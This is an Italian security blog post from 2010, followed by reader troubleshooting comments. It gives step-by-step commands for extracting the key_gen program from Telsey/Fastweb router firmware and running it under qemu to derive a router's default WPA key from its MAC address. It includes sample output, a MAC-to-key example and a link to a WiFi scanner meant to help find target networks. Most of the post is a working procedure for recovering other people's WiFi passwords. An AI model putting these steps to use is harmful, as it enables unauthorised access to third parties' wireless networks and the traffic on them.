ClsHack:Computer Security Blog    

[DEFAULT WPA]Telsey FASTWEB and key_gen.bin

Posted on: 12 September 2010

Gli amici del wifiresearchers sono riusciti a trovare l’algoritmo con il quale una password viene generata partendo dal MAC ADDRESS.

Vi consiglio di leggere l’articolo riguardante le vulnerabilità del router fastweb pirelli e alice agpf:

WPA ALICE AND FASTEB REVERSE :)

Vediamo ora come usufruire del key_gen.bin il programmino ORIGINALE che genera le password di default partendo dal mac :D

Scarichiamo il firmaware del router:
CPVA642_SIP_fk_sip_3.6.rar
Tool, per estrarre il programmino :D
wget http://www.clshack.com/nopaste/bcm_tools-0.1.0.tar.gz

Estraiamo i tool per estrarre il key_gen:
sudo -s
tar -zxvf bcm_tools-0.1.0.tar.gz
make
cp ./bcm_lzma/lib/libbcmlzma_cmp.so /lib
cp ./bcm_lzma/lib/libbcmlzma_dcmp.so /lib
Estraiamo il firmaware:
sudo apt-get install unrar
cd bcm_tools-0.1.0
unrar ../CPVA642_SIP_fk_sip_3.6.rar

./bcm_fw_extract -a -v CPVA642_SIP_fk_sip_3.6.4V
Output simile:

## WARNING: RK CRC is incorrect, should be 0x2afa0e5c
[0x00] Header version: 6
[0x04] Vendor signature (1):
54 65 6c 73 65 79 20 54 6c 63 00 00 00 00 00 00
00 00 00 00
[0x18] Vendor signature (2):
33 2e 36 2e 34 56 2d 73 69 70 00 00 00 00
[0x26] Chip Id.:
36 33 35 38 00 00
[0x2c] Board Id.: CPVA642
[0x3c] Big endian ?: 1
[0x3e] Total img size: 0x0042a280
[0x48] CFE address: 0x00000000
[0x54] CFE size: 0x00000000
[0x5e] Root FS address: 0xbfc10100
[0x6a] Root FS size: 0x0036f000
[0x74] Kernel address: 0xbff7f100
[0x80] Kernel size: 0x000bb280
[0x8a] Dual img ?: 1
[0x8c] Inactive img ?: 0
[0x8e] Reserved:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
- RK checksum (0x36): 0x00000000
[0xd8] Header checksum: 0x5a243917
[0xec] Image checksum: 0x2afa0e5c
Dumping Broadcom header... (offset 0x00000000, sz 0x00000100, crc 0x3530589b) done.
No bootloader found in image. Skipping.
Dumping root filesystem... (offset 0x00000100, sz 0x0036f000, crc 0x73387d37) done.
Dumping kernel... (offset 0x0036f100, sz 0x000bb280, crc 0x285c26f2) done.
root@cls:~/bcm_tools-0.1.0# ./lzma_unsquash rootfs.bin
Reading a different endian SQUASHFS filesystem on rootfs.bin

Digitare poi:

file squashfs-root/bin/key_gen
Installiamo il pacchetto qemu per far si di riuscire ad eseguire il file key_gen
sudo apt-get install qemu qemu-common qemu-kvm qemu-kvm-extras

cd squashfs-root/
Bene ora abbiamo il programma che ci calcola le password di default:
qemu-mips -L . bin/key_gen

Output simile:

root@cls:~/bcm_tools-0.1.0/squashfs-root# qemu-mips -L . bin/key_gen
usage: bin/key_gen
The following MAC formats are supported:
xx.xx.xx.xx.xx.xx
xx:xx:xx:xx:xx:xx
xx;xx;xx;xx;xx;xx
xxxxxxxxxxxx
root@cls:~/bcm_tools-0.1.0/squashfs-root# qemu-mips -L . bin/key_gen 00036F8E42BC
7fcee0998a
root@cls:~/bcm_tools-0.1.0/squashfs-root#

Questa guida ha preso spunto dal grandissimo lavoro svolto dalla WHITE HACK CREW e dall’autore del blog audiocast.it(Valerio)

Complimenti ragazzi :D

file comandi (.bash_history)

Mentre per facilitarvi la ricerca delle reti wifi, un semplice wifi scanner in php che sfutta iwlist :D
DOWNLOAD WIFI SCANNER

Related posts:

  1. AutoScan: OTTIMO Network Scanner per UBUNTU e windows :P
  2. [Samba EXPLOIT]Symlink Traversal (guida metasploit)
  3. [Exploit]Privilege Escalation Kernel
  4. [How-To]Xplico:Network Forensic Analysis Tool
  5. Tshark: Command Line of Wireshark

This entry was posted on Sunday, September 12th, 2010 at 11:20 am and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • daemor

    salve io ho avuto problemi con archittetture a 64 sapete come posso risolvere grazie.

  • AF

    Ciao.
    A me da un errore subito dopo il primo comando MAKE.
    Non vorrei che mancasse qualche pacchetto di UBUNTU…
    Sembra che non trovi un file (zlib.h mi sembra…)
    Puoi aiutarmi?
    Grazie

  • clshack

    @AF,@daemor:

    Potreste postare l’output che ricevete ?

    Perchè così sul nulla non posso esservi molto di aiuto :(

    @AF:
    A te manca questo pacchetto:
    sudo apt-get install zlib1g-dev

  • AF

    Grazie!
    Installando il pacchetto è andato tutto a posto.
    L’unica cosa è che cercando di installare il pacchetto qemu seguendo le tue istruzioni mi dava errore, dicendo di non trovarlo.
    Ho optato quindi per l’installazione tramite gestore di pacchetti.
    Così funziona tutto.
    Grazie ancora.

  • Alex

    Provato e riprovato, installato ed estratto tutto perfettamente, mi sono bloccato a questo punto, non mi prende questo comandi:

    file squashfs-root/bin/key_gen
    squashfs-root/bin/key_gen: ERROR: cannot open `squashfs-root/bin/key_gen' (No such file or directory)

    cd squashfs-root/
    bash: cd: squashfs-root/: No such file or directory

    A quanto pare non mi crea la cartella squashfs, poi di seguito posto il risultato del comando ./bcm_fw_extract -a -v /****/CPVA642_SIP_fk_sip_3.6.rar, i risultati ottenuti sono leggermente diversi dall’immagine postata in alto.
    Dopo tante prove mi viene da pensare che il firmware non e valido o corroto, se qualcuno a qualche suggerimento o qualche prova andata a buon fine può dirmi qualcosa!
    *********************************************************************************************
    ## WARNING: Header CRC is incorrect, should be 0x6a849034
    ## WARNING: Image CRC is incorrect, should be 0xffffffff
    ## WARNING: RK CRC is incorrect, should be 0xffffffff
    [0x00] Header version: 0
    [0x04] Vendor signature (1):
    1a 07 00 cf 90 73 00 00 0d 00 00 00 00 00 00 00
    d4 30 74 c0
    [0x18] Vendor signature (2):
    80 39 00 77 3b 42 00 80 a3 42 00 02 f7 fe
    [0x26] Chip Id.:
    e9 05 45 71 9c 39
    [0x2c] Board Id.: 3
    [0x3c] Big endian ?: 1
    [0x3e] Total img size: 0x00000000
    [0x48] CFE address: 0x00000000
    [0x54] CFE size: 0x00000000
    [0x5e] Root FS address: 0x00000000
    [0x6a] Root FS size: 0x00000000
    [0x74] Kernel address: 0x00000000
    [0x80] Kernel size: 0x00000000
    [0x8a] Dual img ?: 1
    [0x8c] Inactive img ?: 1
    [0x8e] Reserved:
    dc 54 65 6c 72 65 78 20 54 6c 63 00 ff b7 19 97
    1b 17 1a 2b 16 b9 34 b8 7f e5 d3 63 33 53 8f f8
    50 d4 15 90 4d 8d 0c bf f5 04 c4 00 d0 cc d8 d8
    e4 df ff 32 26 00 1f fb 6f fd e3 33 32 31 37 30
    39 ff 02 36 30 ff 6c ff 80 c0
    - RK checksum (0x36): 0x1ffb6ffd
    [0xd8] Header checksum: 0x66007fe6
    [0xec] Image checksum: 0xcce0d3fe
    Dumping Broadcom header... (offset 0x00000000, sz 0x00000100, crc 0xcd0318fd) done.
    No bootloader found in image. Skipping.
    No root filesystem found in image. Skipping.
    No kernel found in image. Skipping.
    *******************************************************************************************

  • Alex

    P.s Uso bt4 final

  • clshack

    Il problema è che non estrae niente…

    Proprio qui vedi:

    Dumping Broadcom header... (offset 0x00000000, sz 0x00000100, crc 0xcd0318fd) done.
    No bootloader found in image. Skipping.
    No root filesystem found in image. Skipping.
    No kernel found in image. Skipping.
    *******************************************************************************************

    Allora potresti fare una cosa _._
    Intanto controllare l’md5sum, cosi vediamo eventuali modifiche apportate ad esso oppure se è corrotto… del tuo pacchetto il mio è:
    4e9094cfdf323c38f338a79464e8b3cc

    Poi, proviamo a guardare il sorcente del programmino che estrae i file:

          if (extract_opts->dump_kernel) {

	} else {

	  fprintf(stderr, "No kernel found in image. Skipping.\n");
	}
      }
      offset += bcm_hdr->kernel_sz;


    Il problema è che non trova l’immagine kernel _._
    Potresti provare a scaricarti linux-libc-dev forse potrebbe aiutarti :P

    Comunque boh :P

    Al massimo da una ubuntu anche live va tutto :P
    Oppure ti posso passare in privato il file già compilato _._

  • Alex

    L’md5 e ok, ora proverò anche con ubuntu, non penso che sia un errore di compilazione in quanto sono stato molto attento nel farlo, forse manca qualche pacchetto, non riesco a capire, me ne sono accorto anchio che non ha estratto niente, comunque se sei cosi gentile di mandarmi il file compilato mi fai un piacere e ti ringrazio, poi farò sapere com’e andata e qual’e il problema, anche un mio amico a riscontratto il medesimo problema, ciao.
    P.S. per la mail penso che puoi vederla, se no dimmi qualcosa, la posto.

  • segfault

    Per tutti coloro che hanno difficoltà ad estrarre il key_gen dal
    firmware, ho implementato l’algoritmo descritto dai white hat in una semplice
    applicazione standalone per linux.

    Potete scrivermi a redazione @chiocciola@ segfault.it se siete interessate per fini di studio a capire come opera il codice.

  • clshack

    @segfautl:

    Grazie per la segnalazione :D

  • Noname

    Qualcuno può ripostare il file bcm_tools-0.1.0.tar.gz ,server down. Grazie!